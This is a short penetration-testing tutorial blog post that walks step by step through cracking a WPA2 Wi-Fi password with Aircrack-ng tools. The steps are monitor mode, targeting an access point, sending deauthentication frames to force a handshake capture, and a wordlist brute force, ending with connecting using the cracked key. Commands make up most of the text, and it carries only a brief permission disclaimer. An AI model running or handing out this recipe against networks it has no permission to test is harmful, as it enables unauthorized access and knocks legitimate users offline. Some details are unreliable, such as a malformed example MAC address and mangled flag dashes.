Wi-Fi Hacking Series- Exploring WPA Attacks (Part-3)

Vengeance
3 min readJul 1, 2023

This is part 2 of the Wi-Fi Hacking series. In this article, we will be going through the demonstration of attacking WPA-secured wifi. For this demonstration, we will be using Aircrack-ng suite tools.

Disclaimer: This article is intended for educational and ethical purposes only. It should only be used on your own personal Wi-Fi network or on a network where you have obtained explicit permission from the owner to perform security testing. Unauthorized hacking of someone else’s Wi-Fi network is illegal and unethical.

WPA Attack (Cracking WPA password)

  1. Use airmon-ng to put the wireless adapter into monitor mode.

Command: airmon-ng start wlan0

wlan0 is a wireless network interface. Run ifconfig command to view the wireless network interface.

2. Use airodump-ng to capture available wifi networks.

Command: airodump-ng wlan0mon

wlan0mon is the name of the wireless network interface on monitor mode.

3. From the above list of access points, we will select the one with WPA2 encryption using airodump-ng.

Command: airodump-ng — bssid 12:78:A5:5B:7N:33 -c 6 — write WPA2Crack wlan0mon

— bssid is MAC address of the router or the access point

-c is the channel/frequencies used by the access point

— write is used to save the dump file using the specific file name

wlan0mon is the wireless network interface on monitor mode

Continue running this command and open a new terminal and run aireplay-ng to de-auth devices connected to the network and when the device reconnects to the targeted access point the WPA handshake is captured.

4. Use aireplay-ng to de-auth devices connected to the targeted access point.

Command: aireplay-ng — deauth 10 -a 12:78:A5:5B:7N:33 wlan0mon

— deauth 10 sends 10 de-authentication frames to the target network.

-a is the MAC address of the targeted access point or router

wlan0mon is the name of the wireless network interface on monitor mode

Now when the device connects back to the network, the WPA handshake is captured.

5. Use aircrack-ng to brute force the password.

Command: aircrack-ng WPA2Crack-01.cap -w ~/Documents/wordlists/rockyou.txt

After some time, the key is found through a brute force attack.

Finally, Use airmon-ng to stop the monitor mode on the wireless adapter.

Command: airmon-ng stop wlan0mon

Now you can use the key to connect to the wireless network.

Thank you for reading and hope you find this article informative.

Twitter: Vengenace0x0

--

--

Vengeance

Penetration Tester | Trader/ Investor | Cyber Security Enthusiast | Bibliophile